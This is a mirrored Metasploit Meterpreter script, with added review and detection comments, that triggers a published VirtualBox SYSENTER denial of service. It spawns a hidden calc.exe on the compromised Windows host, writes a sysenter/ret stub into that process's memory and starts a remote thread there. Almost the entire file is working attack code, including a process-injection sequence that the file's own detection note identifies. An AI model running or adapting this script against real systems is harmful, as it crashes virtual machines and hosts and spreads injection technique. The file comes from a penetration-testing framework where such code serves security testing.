Mirror of metasploit

virtualbox_sysenter_dos.rb 1.4KB

  ##
  # WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
  # If you'd like to improve this script, please try to port it as a post
  # module instead. Thank you.
  ##
  # Meterpreter script for triggering the VirtualBox DoS published at:
  # http://milw0rm.com/exploits/9323
  # Option table for this script. The only switch is "-h", which takes no
  # value (the leading `false`) and is described as the help menu.
  opts = Rex::Parser::Arguments.new(
    "-h" => [false, "Help menu."]
  )

  # Walk the arguments handed to the script. Seeing "-h" prints the banner,
  # the usage line and the generated option summary, then ends the script by
  # raising Rex::Script::Completed, so nothing further in the file runs.
  opts.parse(args) do |opt, _idx, _val|
    next unless opt == "-h"

    print_line("virtualbox_sysenter_dos -- trigger the VirtualBox DoS published at http://milw0rm.com/exploits/9323")
    print_line("USAGE: run virtualbox_sysenter_dos")
    print_status(opts.usage)
    raise Rex::Script::Completed
  end
  # Platform gate: report that this Meterpreter session cannot run the script
  # and stop execution by raising Rex::Script::Completed.
  def unsupported
    print_error("This version of Meterpreter is not supported with this Script!")
    raise(Rex::Script::Completed)
  end

  # Everything below uses Windows process and memory calls, so any session
  # whose platform string is not exactly 'windows' is rejected here.
  unsupported unless client.platform == 'windows'
  # Start calc.exe on the session host with the 'Hidden' option set and keep
  # its PID.
  # NOTE(review): 'Hidden' is given the string 'true', not a boolean; it is
  # truthy in Ruby, but what the API expects is not visible here.
  spawn_opts = { 'Hidden' => 'true' }
  calc_pid = client.sys.process.execute("calc.exe", nil, spawn_opts).pid
  print_status("Calculator PID is #{calc_pid}")

  # Open the new process with PROCESS_ALL_ACCESS so its memory and threads
  # can be manipulated.
  # NOTE(review): this handle is never closed in the script.
  calc_proc = client.sys.process.open(calc_pid, PROCESS_ALL_ACCESS)

  # Reserve 32 bytes inside the calculator process.
  stub_addr = calc_proc.memory.allocate(32)
  print_status("Allocated memory at address #{"0x%.8x" % stub_addr}")

  # Three-byte stub written into that region:
  #   0f 34  sysenter
  #   c3     ret
  sysenter_stub = "\x0f\x34\xc3"
  calc_proc.memory.write(stub_addr, sysenter_stub)

  print_status("VirtualBox SYSENTER Denial of Service launching...")

  # Start a thread in calc.exe at the stub address; the second argument is 0.
  # Detection note: hidden process spawn, full-access open, allocate, write,
  # then thread creation in another process is the sequence endpoint
  # telemetry records as remote-thread injection.
  calc_proc.thread.create(stub_addr, 0)

  # NOTE(review): this is printed unconditionally; the script does not check
  # whether the thread ran or whether the hypervisor was affected.
  print_status("VirtualBox SYSENTER Denial of Service delivered.")